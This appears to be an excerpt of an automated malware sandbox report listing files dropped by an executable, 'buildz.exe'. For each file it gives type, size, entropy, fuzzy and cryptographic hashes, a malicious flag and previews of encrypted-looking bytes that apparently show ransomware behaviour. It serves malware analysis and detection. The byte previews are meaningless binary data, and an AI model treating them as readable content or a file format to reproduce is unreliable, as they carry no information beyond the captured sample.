                        Preview:{"os_J...`...9.Yq.......Zg/.W).....2.y).Rh..L}..... ....Z@g&.).'V!.]S..r..].}.5.....%..2.z..K.X\v.Ju.,4.R5.5,6...d.......Z(O%G..vg4H...Sl.B.e..T.Z.2g....T...].F+u...`j..~..02.F%..`...X...'..x.qu.B.L......]..TQ....)T.,.S.{jK..61.[.z.C( AI8..qU...Hy.Y..7pY.J.......4........c]......x.g.q...(h...AS.V..._.W..V......G...;...#)Q.U.....N..qH...k...k.[....A...k[H...$C].w..\V.".=.......(.{O.bj}v..K.(....<.Q.].....v4kc.1...Z...o...-..d.*W.."Xo.v.6...\/8;....{8..Rc...Jd4....l.+..L+.s.v-...T..my8#.V5(8;.0h.3..u.n..PK.^..9C....[...ve..:...B..."z;F...B;(..C..L.\......h..=.:...9...K....L..".a..xI...3.x.9....7.I>....G.B.p...;h.TFX.........]1.{..&..x`..\...:k:.6&.i..=.(..#. "a..m........(.cy6...a.S.%....u<.OU.....EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:PostScript document text
                        Category:dropped
                        Size (bytes):1567
                        Entropy (8bit):7.873317984995965
                        Encrypted:false
                        SSDEEP:24:BgAO1YyYwAP3mwA5eHt31c+DcpWVpDCK9s605u9BoryyxeP/NRQ3dMGbD:a/YyYwrwAmPC2DC4sokryyxePL0dMUD
                        MD5:C282232B8F49BF2364C4E15CC68B5773
                        SHA1:49FA151E0F8EB6E1CBEADC25332617FE96781714
                        SHA-256:67FC21E508B1F2508AE02D23CF71864FBABECE9BC5E9CA55D691EB0D0DADAB55
                        SHA-512:73B7382E913ABBCF214C82584DE24D620F812DAB787EF6F72B26762D51BF5454387686FFFFE45B9C3E0E3D49835D78FA0150DCE852F18D07A5F2777FFA34AAAF
                        Malicious:false
                        Reputation:low
                        Preview:%!Ado...ABM/.S.<dQ....WX...}.a.....x;.u..fW..`h...K$k8....~...0.].4.jp.'J>.B.....IK9Y...C8e.s... ."%.y.v.....7i.F..On.......K.....I..u.Z......Mt)..-.`j....\F.7$'`.....]..Ete..)..G..*..(..a..K1......]....(g.5.+.o...Y...<......I.7...>l~....qE..>.w.@.e .../M......e4c.Q....?.^V.o..`..;.GAg5.<..CA<.....@.k}.hb.~.B.?+Q.....`.."1....l..C...P.>5M...LN.!_)S.s..s...i...y.g.5.Vm.A.;&...I.8..p.l@.....J.y,..0...v<b.gF.E..M.......;.K.8.r.)..$6.....>...>0T^6.tnD6..6B...`xr.*...b2.Z,...z.'.!....0...O..S..y....cY....1.!...9...B.Y...-,....c}.....u..J..F./Y..q..(.$.....P.'_>W...A.,.._.o;$.e......n..w....L..90.%t...yv..T..].|Q..%.::.cP..1.'.<dN......B?....25.F./U..+X.}.x@N..#......r...*......W..5...OV.A.J...s.IE. ..4......F*v9v......i....9S.G.._.0...*'.....!..';/..G.!)./.T.P....B^.yIA...X.c2r..8.F..Y.).?....R1.....&.#.|..^f..*.<H].8]...D....V...1..]...........y.m<..-..@.aG.......>.G...xF....w.2x.y;.H,K.il.......e........Z...........2..6...V.n
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:PostScript document text
                        Category:dropped
                        Size (bytes):185433
                        Entropy (8bit):7.876215877463176
                        Encrypted:false
                        SSDEEP:3072:pc1mvdKNXeW+sP38AHt343dX/J08s7vlklTMDRHggIfUvpatgUb6j9XE07ZmandF:vKci3PHtI3vRsv6RMDRFN+49XE07ZmaL
                        MD5:4642D002177F7C12215DA2CD0B46FCAF
                        SHA1:709F38D1416CA16B16C40839EE77B8425F99B746
                        SHA-256:7C4E4B70F29DA0D99C9D0342804E8974FAAE435959A1A499916DC1278A59147C
                        SHA-512:4FBB83E03F7A8FFA36FA1F2593675DBD1201A76600192F155BE36BF5E1FAA0ECBB37EECFC22F94D24706A4DF54933E96DB92B00280012F715A88FA9689068B93
                        Malicious:false
                        Reputation:low
                        Preview:%!Ado.UC.Z.,..).s......n.....}...30..V......4-.WlsQ.c.....1,@.=/.,^..W...JT.|..Pz.].H.y...f.'........7.t....A..=..H.*.E....."..]J..j1..T.....:@.x:......A9.>h...N.`.jd1.k%.>......!G.....-.......v.k.qp........p..WI.d...m.p.B....M..j}._.Q..G.......\.D.w{.>QS.......j...|.f..x.\..<V../.).....N..Wv..c..&4.l..S.;.E;p.L.r.V.........b.......]../C`.....c&C..z...\r..L.w/... ...x...E.z.........T..h&E...+.G.....MVa...f.&}{..4...b...\...~...9.f..B.(ch=s...1.'`..:.1"-....h...+p;..g...V.i..4....PY.Md.......f.k....bd....0):?=JO..b.@S.o;.E.?....6.Vi...t............L.*....g.....K.C..[....G..*@W...U/...5C^a....A*.k.O`.V.=."pH.....t.t..:.7.6k.....j.KU...h.._asT..D.M..45e..x..@......w..Q.-F...X...qeL.X+...0..?.....lp..(......5_.F...U......X.uEV..\1%!...u...}.p..f..........S....V.4$G...L.kc.../k..n.x...q....`{.........Wx.....:._.wI...[<.L..~..A..@......X....Ik..:S..{.%...!..6....g.:.n7.z.....;..<.lsd.*..Aj`.$M..h..o.:z|.\....N...*...n....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):227336
                        Entropy (8bit):6.986727551755582
                        Encrypted:false
                        SSDEEP:3072:XI0a4cJVvUZtyvOaDYyos4C6sRISJJm6nl4Ca6CWOBeQjU7N8BmPO93OoWiRnnA:ba4cweX9oBTeI561auPJ7+mO1nA
                        MD5:9C1E2C13417078C39C1F3F80CB764CBD
                        SHA1:10F48D153CED7B843E55966CEBE1C190605C1F09
                        SHA-256:38602A1CADF18EDA76A38FF4559E989D0532E166E876926821CB81DB750B2D81
                        SHA-512:EEEA53030923F5B477861C4548656862982FE489AA2DCD5CF66240ADCF52CB5E8DA39F46363CFF8EA9A52F3C88F8861E106AE7C7F645FD9918E9B35C8BF28E4B
                        Malicious:false
                        Reputation:low
                        Preview:Adobe{!..\..QPY.S.h-..j.Pp!$...H.E.8.8P.....f.IW.,.t.l.O.....L..U$ak.........PjO&.....e.SP*.R.EIa@7..dr...J!Epf@.a..k...v..F.IT.cLSt.M..%l..../.1]......%..}.w.N.....9...q.fG'G.Ik..TD.........d....a.e!.uDO~.U..Q.j./#"U....].I..tF.K#.0.#.....Y#G.c\@.U........)].........k_L...Z..]'=6H.h..@.......&J.,..Q.....E.^.. _..+p..l..t.....N.G..*..R........y.=g?&z.n. V.%....:.d..+x./f..C;..5.@...%..~..s..6#f.......=C..}.j~.!p....f.`W..<.............|%U.0..}.U.T>....y..S.qp.+.T..E...F5.M...L..3..B.h.jV...%.........wJ.+...5.+.......?B.|...>j)..O.)..;.."H....5.........._.tk.....+*.V.....4rTW.!.{>Z....&.....;..&..^#.k,.&&....$y.ZJ...drC...Ec.0|V...C.Gy.._.7+..U..8.JK.1.v.?.Q.q.;....\._pX*..G:.).FU.....X..n..j...=..tf.=..l.[#tG...P._% ..!SB"..>.@..=aM..pa_...I..&....?.q......b...P.....&H.gH...>q.$#6^.O9../q....0."z.X.+....L.,.=..Y.;W..ay..T.@.B....hb.../.*...M.LlW8.?t$.I.JT.~ @W......_.e...GmbhA.9K....D|...:..q......34...d.2}...mc...x..m....~.h
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3152
                        Entropy (8bit):7.935788622577255
                        Encrypted:false
                        SSDEEP:48:Y/Wjr4p2oecDeL8mCaYEM7JuBwpiscWKvzQN3sI/AvfC1qpZbVLMhPGcxDoTDt52:CGQ2ekAdp2wbcPEeiiEGEc+nZ+ysyUBA
                        MD5:BA612608452C1F9341A28AB3E8D47D39
                        SHA1:ED2260D2AAB9C15530735AD51F392C1483D06EBE
                        SHA-256:D5E34B7E5CC77A2B1A67A8BBF706A3E377DFECABDB786555A36F60F61427B4AC
                        SHA-512:4B7A97FC40DA311BA4F21B71E0728C8CE9C3E7D3DDB3B9A391FE62A5D97CD0A46313944B9A599537B7DB7F15C04C5AF2B0BC70157B99BA4C20D9911EA7AE0067
                        Malicious:false
                        Preview:{"all3..-.......W.........5..R'b.n.u..3#.b..{.J.&..BN......0..X@..kb.<.9.?jp.t..AU$.9-...R.S.`....I..U....g..xmn...@..x.;...KuUE7..+...l..a.u.Q.q.......}P...Mf..........~.w..v%...>b..............'.....e._.2.......M.u.N..h...K.ZA.-x...vY-...#u...L...~..q..o....~]i^q.....$U.4..u;..o.q...)..........k.DER..U.Q.....:[.......]u.....r...A..N..l......k.J.V...}o{......Ew@P&.......?.1...z...PD{.U.i..(^Z....@O...{f....x......i@#N.]d..|....,.@x...Qmz.l\(..W..x~.h.a...lq.2H.sE....3SO.....;.Gg..v..`.&...N" -...f...........[...........\...Fh.`.J.....L.!TU*....&.....d.L_$....f.v..........TvZ[.".].V.i._$...:..o);.vm.]..o......0R..K.L...;..du.._...CU....m......:.HZ....f1..[.f......E<0><...c.> ....d..7.?..]f.!.q>..?...1W.K...U..R..6.Z.?.X.#?...\.J......}:...V].b..y......<..."\....-.3-nx....../..iz.m........@..L..f..2.....C...~F.4m.8.~?......8.mXr.[....)....e]O.'......>^<q.....{.]7..k.x....m+....L,...M.CP^F{......r.W.0.l...N%kW].X.]U..6..(Yl....R.XP..}W..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):67060
                        Entropy (8bit):7.997517889853005
                        Encrypted:true
                        SSDEEP:1536:psTTADM3RXkMw33dnTjxnKTWroY0v28gUZj1z+WP2vGdA:qPAA3J2BxnuU83ZzRdA
                        MD5:CADB68A50D1D08EDFC57982DB72BDE4E
                        SHA1:E3C8D57B7B5BE94FD0070BDF85855986C1752CC3
                        SHA-256:BB3BBF271EA8427B19034119D2414EC7647DFA75A73A534137FD5E3A766E805C
                        SHA-512:C9613A0E6DA76EEAD5E81D96AA0626A5A65B76C0D9F40622C50DC9EDBE359075C278D9C50BBD8AFD377A31C5057F53F8438910EC9B99B9CBFE73913274922834
                        Malicious:true
                        Preview:4.397e..^.....35.[...-[...X]..(.@......K...B.x..2.G>.!....K...q..;.pI.f.*..N.2..i..iu5....h......s0.......:8....w.......=..5.g%.;v{c...#..w.XG......yA,if3.n...3.........../..TB.K...4(G....ET..3Am....7Ma(..8..Y.S..\_.r0..e..........U..7...Y.....GIm;p.rig.|..6..$.}..:.[.u..s...N....:.3y..n`w.-....8Wn..,.Hq........N?.....d..5#...i6H....Wj.X......#/|2...tf&.F=.qWz3.H.Pn=Y...I.w....o..jDWt..j..g....j.7....).6lL&..S7..!K....Y.~..........Z...k..}P...$+zzF.J....~....9..G.bW.y.H.p..G..;...z[....S..k.....m.&..X..@Q...._Z..>...].<7.0..=..?.7P..O.l..4%!&-z.....O...)c..|....8eh...|w..T..I.oS.[sjtM.r...?.....7E *.....+.....vl.I>.1.+....)O>...lC.Gc...S........J;.T..4...H..:.........>e..o.>..<.9.a.C.,4.Wz.i]..*....!( ....N.].:..a.x%b.v...e.f ..b. ."..[...8Sd...........ok..t...<.>.....b.o`Yd\P.....wP..\.G..N..T+.O.+G.B..Ec..........ux.t.....J....c$..!......vRe=........x.+.6..Q....mo..[.pSE..E..{.^.+N..E.......J.. Xy^Bo..m*.Z....}/;#`..V.....a1ns.l..Z..D.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):486
                        Entropy (8bit):7.504105483146077
                        Encrypted:false
                        SSDEEP:12:q8L/M45fFHUFhc2k/62yEpsii4Sw2wBKI26Gcii9a:5LE4nHUFhcBBp2w2wBvGbD
                        MD5:8198AC261FCACB874C61E46FC3444A2C
                        SHA1:33D38F2D758AEDA0F213EFDF27B9B5AD0E29B2CA
                        SHA-256:B86F30FD5A724FA879036317BD0AC5872422C91B1046727017CBAB10E19C20B2
                        SHA-512:C09636DA9CF14E7D26D23F1814AE6229A06C68E08A4221BDE325E2A2D69F78AFE863BB16BEBBD1E2FC2A56DA3B7D6FF4BB57F4FC664E5AF783B17CC28B30841D
                        Malicious:false
                        Preview:.f.5..*R..oiC........;N,..=.8.x....q..-.]..U.4...O......T.R...*.x..!g|.M .h"o....n..Kxu.h...6~..n.j[.~..P4.7.*3~M*i....{....g...l.............P.W.......Q..1...e.F_,.....a.o....E.:.V.N.>S.>9)...h.....#Q..0J.k..A..Yz.R.qm.a.5..-...F....(.k.,.&....p.q..|.;......G..m&?k..|..ek...>f.M..G.KH.<).?.0...0i/k...Y..Kn.l:....5...L.v...u..R.$..M...............?..\$.e...!...OB.........../..v....v.\EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):486
                        Entropy (8bit):7.503456082237984
                        Encrypted:false
                        SSDEEP:12:qaM0DszoDbMvpfjFlokQaDqoayTqhsYU52aM9IQHVTz26Gcii9a:mkSebMvpfvoiCRHGbD
                        MD5:91C02626D070F15275F31D13F59B96C1
                        SHA1:0FCBAE3E53DE1F8DB34A819667D3AF30B1F2A3B5
                        SHA-256:12C2D33ECFCD79383E5E18477BE444D0B35D88DEC9C568161DCA06FA018BFCFC
                        SHA-512:94D8C908377ECAAD18AF738A1ADB700C2FB90C66F1D0F70809FE0D62FCD0C288F6680E9853247732B790AB47BAAD1CAC39625ECDDEC297096A594F4DD4ED0895
                        Malicious:false
                        Preview:.f.5..5 .Rm..=`....~kKt..k.....7.$........G...E.>..*.....R...v....:!...!8..3.H.i..J.U....z..2&...........N.g!/c..Q..i.-3@..p..y.l..V>.US....M..,G..'..-..s....l..k.r57....{....;7..$@.a..........R..}.8/.'..)"i+.Q.[..[...R.sLl2o6]K.@F..Kz.0.*.......f..c.3.9..[...%......o.f..,.X.?..$.Xk. ...w.......`F@......Tr.^ziw...Y4..9.....\..a.'s.|..]2.R.B..):.B^.G.A.L...}W..:z...&.!~.R.Vc........Y..%EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):790
                        Entropy (8bit):7.696114449299386
                        Encrypted:false
                        SSDEEP:24:WlnXrKdzblARvPGbFevVkjoDJ/95aKDvr1GbD:Wln7Kdl2vXvVkcP5BP1UD
                        MD5:0013D0AAC0E40D617E7C12C4A537BD13
                        SHA1:4F065B0234E9A03511BC79F5AC4E3224FF46CA05
                        SHA-256:713E2EE4734FBB693ACD6197C185DA887BB12FF495DDF06393ADAD04ABBA4C3F
                        SHA-512:9C3F3394BC5D868F1EE3DAB7A2C51DAF29AB5C37D472C0341C037BE22736CF8220E615E5E6BBE2235D2537FFAFB4FD4114F4BE97BA5A68A4E930E156391F5248
                        Malicious:false
                        Preview:.f.5.....j.j.}.W..U.+...W...clf...'...V^./xR.g..c/..|e..../T...\...2..cb...Z.......6.B...I..|S].2b.;.)....Z...^6......l...i$<....R.9nF%....._...(.....W.SmqdoH{aT. ..V#.......W....&..2..........#.....jh...U.[....J.IL.[..f.l-\!>..6.$-&.@<..<.D}...#.%..q...+~.9.o.D"v!|.1.x?o..3....$.7C..0...W.@.pH....x...... ..0T6.".....d(.H2[....f....7.*]Y"......g$...2N.P..^.IolD9..'.}..r.@.m..=>q........5.-..[....c.. .{.B."S....J...;.).Dh..K.M........_........l.H...b$9-.:R.4.q ...k].8}.....j/..E....0.y.Di1..@....|.,........j..'..........*..%`..Yv[S.%....!.A..5....w.o..w.......(.%u=..>..........-.+.~7.....`\t*J,.).-K..V~..t....Hg.GU{..V^.(8.=.2.t:..........v0..:..\......J.....9!.D./EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):5316
                        Entropy (8bit):7.963175417778956
                        Encrypted:false
                        SSDEEP:96:UJLUoFcm2EOzMHQUDkS0RxuectrJWb05zFqo5JlCgfT62NHUbYg0j9SstpXJA:UBLcXEpwU8kr/5zsoXkgf9uMg0j9Dtp+
                        MD5:19BAA8EEE221EDDB1B01772289EC0E3E
                        SHA1:888110762DDC732F2752B4C7FE2CA641CB64FB37
                        SHA-256:D33DA69EA3465A429607E9874A10DEBAE91134771E86D6FABFE136FA05931D3D
                        SHA-512:E4522695EEC98D8EA705B382D9CC321A15E35E9E11DF8C764D48122F4A7B86B5C7BBC112555C8FF4518E768577E3EDD36A06873B6F88FEA9852514F3CB2749DC
                        Malicious:false
                        Preview:.PNG..!.....dG.+...5!..X4......y}....u...x..+.j..F..&'..VV....5........*`@h.BE..\.&b.Ok..L}'.0Hn.K..`.-...u.....4..@?..f3.|...q..!..S.e..z....a....K........X5......eh!...Is.o.,<..Grl...*?..:j..E.)...~....}zi.*~..8......n...g....I$u...............<f.....N.V^? ...Nf ....J.Ir..4....=..d...P...C\....`...IN...l.K.:W...-V....q....xQ..b..eM..wm.h0.....I6..&'....lD..!.I...nVG.8-.<,%...Ygfz..@@i.......E.....MU.*!..5...lV.S..o.i]X.C.f)..l.....;....@..gr(.'..xm...B...r..1.....P&.JT..:.....).B.$5.... .d(.\`.bO..<h.vQ._4.A.."..w.".;.....77...;S...&..cb./...6CE.......mE....(..X..).Z..ffB.[...g...d1ZKg...s......".9qy...@...C.@vwq.f..g.Q..Ha.s{.........7d..@..I...Ob......x..i.t.|.-.*K..HU.'....F'.0.....>p..Eu.tU<...=t-W.....cYl.z.y.'G...T".......d...`G.'b.G.=..8$.Iy.$..&....9.......++....Ja...........Z..4U...t0$"..0..(/...<....>..=.........0.O......[.aF.,N.)..o^M..&.db.a[..3i[s...N#(x.}..h.AN..N.".p.L.......K.Q....Q....d..}.ZG.ZV..#......|.Ja...J<..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3748
                        Entropy (8bit):7.940937856603959
                        Encrypted:false
                        SSDEEP:96:hczTToRJRfd0lbCrfjqGsYsohYLWBkJ7gs+VPsRA:hczTToNGlOrVsWYLWBkJ7yPMA
                        MD5:38A5953676136FFE75E18ED78AAB7A7A
                        SHA1:92CE227DC9F9DB1F8ACBB4C6F764983AA7CB0F7C
                        SHA-256:78288AC70B7C3991360F8F0A54A2FE3070B66F8D6D88625E6759D60CAAEDB994
                        SHA-512:75F8A1FAD8C557B4F882F8660D87D26F05A75447360A66501DFD8B9E416CDE5339172A73FC55924DD47DF55361BF7CDB441A5BE2D4B86FA486E241F9C5267BB5
                        Malicious:false
                        Preview:{"filn..(.2.e....aC..|1...^..s..|].P.`s.......Z.p...t....J.t@..u~...Pr..V...&..m.8V.../..K..B..).e.c>S9.O...J6%,.DN...[.[.ZlF.......3W......ir..z..JNS.....ag.05.R....S..0=..dZAA.p.]...C.'......O;.......#........\.Y.tG..L.l7M.:.&|......+.(S.. vNwz.1U..{._s.{._a.bv`5.3-.U.....)...+...,.UxR......%f..F3.....-..AR.3)..5..yz%C..O...4.S...l>"y).......Z.XS!3.{0s.. .(}e...q%..;.}.X{...A...b....v.x....`..m:(.^....>.,......D.T#..To.z.G..R` ..L..O?...f.Y..\...b.H.5.6..I*...LK.."N.XhX.....}....?.t..Q.y.`..X..hdI.....Vv.V.sk.{..(.(g.!U../z.An..U....lm..k8..8...W.......'jH-b.',.N...n..^....J..4...~.....#).B...9m.d...p.u...F.....-=+L..<>0@.IE<....g......../%.l...j...pO;]...&*7.2.N1...R'5e#.p:........Y.K.....&.`..."U....#r.%.+^.-p.X(S..h..YBVQ.... '.):..._N...*...o...+.%..(U.?.+$$.+nL.=_j.9:..U.....e.(.<[...{.H..Y.3y.z...<..-?.f.^..L.V..A.....jju...7;..I1%...P.-...boA./..&....2.[,.!@+.#:=..<..I...8f.'L.3.{...Q..q.Q..P..`.?..F..c9..............(.......|.W8NZYV..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):18852
                        Entropy (8bit):7.989701428437362
                        Encrypted:false
                        SSDEEP:384:+4QuQbDAGwT3+oK9ykn41T18QMV8Ab2XN7dQe1Ib/LreZQclWnQiDoxCd+rA:+47Mk3zKMkn41BXMV8A69l1y62kWnQiR
                        MD5:D0CF191536EAB29A607C96C5DAFF4C16
                        SHA1:899FE95812D2395708B3A33061D50331E2DF1EF1
                        SHA-256:B622B15EFD1FD10A7C06DD33877FBD306334301B9E17A2BAF28BD0079F5B01A8
                        SHA-512:877CF29A16B42694BFE39EDCCC5569AABFF8FB248EADFC3DA0337EE49FBBD33432F005FA585FCEB32758D6A364DC793B7A1AF7FFCC2B658074F32E94A5A12981
                        Malicious:false
                        Preview:[{"de....~..L...v...z.......Rg<..."N...TLu.1.......87..yO.<....^].o..^h.a.h..U{.....<|..A: .g%.......:+.}............(.R......e.U../7.{<...??..\.[..9.7.r6..5.>2w....>q<.....NE..`@..*D..0.BM....L.ENE.:#h..4..T......<!....0..0[c..|...QnO.......i.M..Wf....c9JS.|.<.fK.G`G.s....:"...?.h])Yv.3h..bD=1.?-+^.......U..'0.1.B:.x..L....W......;....Z...s...B..R....O.....y......Zs...HC.2...k.{0.....c.m4./?.V..>..<....D.......o.-....u.=..q...)....j.b$..G.A...>.s...2.5...A.&..h....-..6D..&...@.m7.7^.Z.;GP.`.U.'.E.y..a..V........<..|......t.b.s...^..03]..R..F..[M.S0....n9.)p..C.4..U......p....... ....>.R..;.?{.K..H....]"X5.[v...i..0...<>a........mh./..'..5-.l.%t....Y~....M..KspCy#j.2$...A....Ax....|...U.76j..Y....crf.).."..H....a.)........X...b]........+..\o...nj..'}rf......m..........3..?]nl...\......VT"...9h.;o.u...r~.j.....^.3._<.y.V-..M...\.%.....M.]nt..C.!...~@.CSr8)......M[.1$.B.8.-....Z?.......].k%.k].pz[....7l9...H.L..i;.a+9KY.X.(.....]
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1188
                        Entropy (8bit):7.821478142370286
                        Encrypted:false
                        SSDEEP:24:9qb6vfFjSsGCT3CMpdUi1pn88RXlXdvrFqQiZ198/MhKKQyGbD:QuvfF1GCT3xpSi1l8iXdYQiZ198/KqyA
                        MD5:B96E458EC9A5190D5462AD896AB2BAAC
                        SHA1:228EACDA132C6CE6853016577D87606CA9C47956
                        SHA-256:DA666443F412DCE4BBC227182594F9EAB9005D8C67DA2FF77E7C852EDC7D0CAD
                        SHA-512:702B3E94D1B9868FFB4B1E8C642F7622750F9B77C977810C70C4B76EB509B8C85A4C8F131BF82B26C00FF0A88256AF3491635097DCA0DF7ADECD50CC9C99A711
                        Malicious:false
                        Preview:{. "_Ne...#.-R...-...9......*OX>O.6.....X...@.<^..l.`...kZ......R....Z IL.}.3fK..=Y.x=.[hrr..V6.....E.uwB.....Z...I.#.6......v.B.m.T...a.....]Y...K....+..N....c.U.ZC...*.x.;.u.\`./.t..y.Z^GG.3.s%.....&u...._L/.J..Q....m...k.{..i_...\TD.0..q..O..O;...>..s..-.1..B..6..U..k...../a...z$.t.m!.s}..{.Se1M..Q.NW...L..-.......y..:+[....%.OG..g}[Sbqd.L(]HT@.._..)...Sq.A.Q..#..f.y..3...:..b..w.h.........J....r........`...{Y.n.R.8..c...F.$,...W&...y.k..&D$....d.M..........q.NW..Y.8.:..a.......uL..9..~=.%..T......Gv.6T.....'.9^h..G.:..h.sq..?dG.OG>."....E.G.P.,9:..9._GFS...... ,....w@..l.3.l. ......Wge.r.....wo51U..A.R...R..v....@0o.....IP.n.P`.#.0..zTsF..=.U.....r..Y..V..y.q:......l.DN)7{.P.*1.t....s.|..'_/.y).jI...].p..w/R".0.....+f=qt..1...`}G.1.Q....l.pJX...p..R.?..C4.H...c8.!@&9..Mn.W.....TZ.uT.+..$...,2...=..H6E.1.qr..1O._...$D.+..o*..At....C..I.~..y...W.Ki0..].CnOP.^....u..y...h.......ol.=.....Zkn.<.c.7.......8H)..'...6..O...Q...!...Qq...[.i.Z..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):80603
                        Entropy (8bit):7.997957144357044
                        Encrypted:true
                        SSDEEP:1536:o+ViUbQ4hbTUeHmpdLBi8756JIVuPugQbfEuHXjRhL0nCFvB9rxQihImRsfaHKjO:o+ViUM4hbQgmpW8ArWPEuHzHOCFvdQaD
                        MD5:76A58708F535904F600D3F0988C0F0FC
                        SHA1:727CD6CFBD5179B11AEEE294F72BA74F1DCE0E8F
                        SHA-256:FD63964D0C88C6B5420953C0CBA29CA45C31B829B318366F6B663E22B706952B
                        SHA-512:8285247EB6D18E964251E446DCAF3D2B8DF888E144248C9761E54F4316D29F293FB56B55024B33460EE8F3DC2F4F5F471BBF07D32620C4233AAA55C46D40D9FC
                        Malicious:true
                        Preview:/*.. ...W...$fm.......On.q`.}O%W.....Cb...h~F?5.-4..r.<..@.`..W.ZN%..P...........8....bE."..w$#....x. ........2F..y6U.JZ.......1S.&..d%..X(#..T.D.Ic.E..W.=2....0.W;i..xE...!(T.V..Y.8D..6A*.-..n.a...a.Yd.b..mGI..z........>........a.t.....;oYx.:..7.n..'.{.gE].N.f..J%rJ.Q.8.'..@...}z./+{..A...'...6..[.s.U..)....`B....h.9.......Ws...X...KQ.\=8..tEZ..kj.*<z&...hfg..z?.5Q...C......&...HWS&Q...,"....P.!.4.DgM..".wA...G..6t..E`.....GD.P..w.. ..0{+.y......1.j.6#LMN@..3.....Q...F..pL......>..<..U.^B.?.H3."..#..d.RT......K.(ma [.VN[...n.....C...%7^..Wh..'........n..9...t...(Mw:.#..5.~..-..?V-R........P.L7..u..r....?U..o..F.n.43D..0.'J.B......s.Dsy.....3fg.W.....e.NB|.#...@D:.-p...J.....m...k..H@.E.x`h...7=......n..I....Fs..!.'.Yr.JV..BG..8),.j.k:....:..w.6...-.e...p........*v..O...`pr.!.F..7]...Y.U..j.....&.q...?Nn.y...|.[..uT[./F].g.......K..b8..4c[n.rf..G..?5.jD%.O..f....~.oA^..8.N?...U..^7..~.../A...E8.y..m.".....=.......-...2.Yp.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2731
                        Entropy (8bit):7.930867863878145
                        Encrypted:false
                        SSDEEP:48:dqY9YToKdO628iXUsily5ZYRihwmIfjTXGsUzfEqD9JdUfWau0Gz/SXYe5wU1Jhc:dqZz29jig5ZYRMImsUzfEO94O9/S7CUy
                        MD5:CE65CB4AFE2A83C3E3E6A458AD71D79A
                        SHA1:E9AB598BE30A67F33DDBDBACE3EFF8F21F252AE1
                        SHA-256:77D36923EA3E03DD6E0D3245DD8A5F7D153C434E6C732E795CA5787991223C2C
                        SHA-512:7CFE6FCC8129A05B494221B44ED8E85877DC1BD84DD1268E26208C86F163B324681122650EEF6B46A44B8A8F09C6AC3F6DE94746ADFCDF7CE67D3FD7CE06A857
                        Malicious:false
                        Preview:{.. ..I(.q^j5...*.....):!......"....'O(.........i[..-.....D.......DI..m..D.[.....=E.vK"...'WH".../4.. .............P.."....b}*~]'.....$..+,.o.E^.0....m6...2?.79..j...4..;....R..8q.X..-.kE._.x.].Z..CX.,..t....I{._.sF..d.O...d1'..w\IN.I...Z./BA...@f!xu..L.H....!.........^F.@{l2..5..(..sqC.]vL...!.i`.yr.e..D..Y..............P.2..A......AmnJ.....)...@w...g.Gb..0..h..P........o.K......QaR..RP..K-..m...<.~.......g.6&.H....A..w...f..).9...q.7.K..i.Y.:.~/.J0.....ooBe,V.N.zl...K~.Y....}.zyS..|..2.lC.u....!.. ....m8......u.9...^..e.....T.DP..j^.9.T.n...~.T.|...#.z...@.X..UH..^.....9.....r.k...`n:...9Y.&...I.....2O..._q..r./vB.y..!.....5l..p.#..O&..j,..?.].8..FZ.i.zv.........J...?U ...Ci..X..xl...#z..E|nw.U.\...J.......{(...r........P%.....bX..D.......5..uT..]']1....6.I..o.kH.5[..p......-...J.....'...*}E.`g.4v....Q.A.|.....5.;}..d..........6.EL....o.f...2.....c.....h.d.......j.7..k.....s_...f.v..Z..yjM.(.'...G.@.....E.#T...N.b?d.y.W.8...>...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):625
                        Entropy (8bit):7.627497157044515
                        Encrypted:false
                        SSDEEP:12:23bI4KSz8pO2Lq9rURCX6GnM8nURogMs7a3ohMi4jKnUUCGuz26Gcii9a:23Myz8py9QwhUzMs7O/lKUUIGbD
                        MD5:537C91E16B824E1D5C18E56F05519BC4
                        SHA1:34ABD8A7EA02C31EBDE8D55D640C824AA72A6660
                        SHA-256:7B1392152CBBD35B811737B58E3BCDE344C3B438427BE119E491F4DF9225A370
                        SHA-512:8186036C4E4F39D9B589EFFAFFAE53115F51E2D837C42FB8BCBDCACC4A764696F3350E0ACFBD019075AF12635DFA2500C038A5A903AE1A3B01993E67D81AD02C
                        Malicious:false
